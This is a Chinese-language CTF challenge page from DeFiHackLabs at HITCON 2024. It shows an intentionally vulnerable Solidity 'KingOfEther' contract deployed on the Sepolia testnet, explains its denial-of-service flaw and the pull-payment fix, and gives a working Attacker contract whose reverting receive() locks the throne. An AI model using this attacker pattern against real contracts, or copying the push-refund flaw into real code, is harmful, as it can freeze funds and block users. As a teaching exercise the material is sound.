# DeFiHackLabs攤位挑戰賽 - Long live the king!

# Challenge QRcode

# Code
```
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
/// @title KingOfEther - challenge contract in which the highest bidder becomes "king".
/// @notice Intentionally vulnerable. claimThrone() pushes the refund to the current
/// king and requires that transfer to succeed, so a king that rejects Ether blocks
/// every later claim (denial of service).
contract KingOfEther {
// Current king. No constructor sets it, so it is the zero address until the first claim.
address public king;
// Amount paid by the current king; this is the sum refunded to them on the next claim.
uint public balance;
/// @notice Become king by sending strictly more Ether than the stored `balance`.
/// @dev Reverts when msg.value <= balance, or when the refund call to the current king fails.
function claimThrone() external payable {
require(msg.value > balance, "Need to pay more to become the king");
// Push payment: the previous bid is sent to the current king via a low-level call
// with no gas limit specified. If `king` is a contract, its receive/fallback runs here.
(bool sent, ) = king.call{value: balance}("");
// Root cause of the DoS: the whole claim depends on the recipient accepting Ether.
// A king whose receive() reverts makes `sent` false, so every later claim reverts.
// A pull-payment design (record the amount owed and let the previous king withdraw
// it in a separate call) removes this dependency on the recipient.
require(sent, "Failed to send Ether");
// State is written only after the external call has returned.
balance = msg.value;
king = msg.sender;
}
/// @notice Returns the current king; same value as the auto-generated `king()` getter.
function kingIs() public view returns (address) {
return king;
}
}
```
# Contract Address
https://sepolia.etherscan.io/address/0x69a81d9fdd7e9549d545d4b68336f2d762aaa5de#code
# 填答問卷
https://docs.google.com/forms/d/1nylizdPCTtzEbjI39gDdSMVnCi3tZwu70WD1D1AJDP8/viewform?edit_requested=true

# Solution
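合約在 claimThrone() 中以 low-level call 將舊的出價退還給現任國王,並用 require(sent) 要求轉帳必須成功。攻擊者可以撰寫合約並在 receive() 中使用 revert,使退款永遠失敗,這將導致後面的參與者永遠都無法成為新任國王,claimThrone() 因此永久 DoS。修補方式是改用 pull payment(提款)模式:只記錄應退金額,讓前任國王另外呼叫提款函式領回,而不是在 claimThrone() 中主動轉帳。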
:::info
解答
```
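/// @title Attacker - reference solution for the KingOfEther challenge.
/// @notice Demonstrates why a push-style refund guarded by `require(sent)` is unsafe:
/// once this contract is king, the refund to it always fails, so claimThrone() on
/// the target reverts for everyone else. The fix belongs in the target contract
/// (pull payments), not in trusting recipients to accept Ether.
contract Attacker {
    /// @dev Rejects every plain Ether transfer, including the refund that
    /// KingOfEther sends to the current king.
    receive() external payable {
        revert("Attack: Reverting receive Ether");
    }

    /// @notice Forwards msg.value to KingOfEther.claimThrone(), so that this
    /// contract (the msg.sender seen by the target) becomes king.
    /// @param _kingOfEther Address of the deployed KingOfEther instance.
    function claimThrone(address _kingOfEther) external payable {
        KingOfEther(_kingOfEther).claimThrone{value: msg.value}();
    }
}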
```
:::
# Resource
HITCON 2024 DefiHackLabs 合約挑戰賽指南
https://hackmd.io/@jbuCOBZvRjaiqc9WpSNXMg/SkIqdAO5A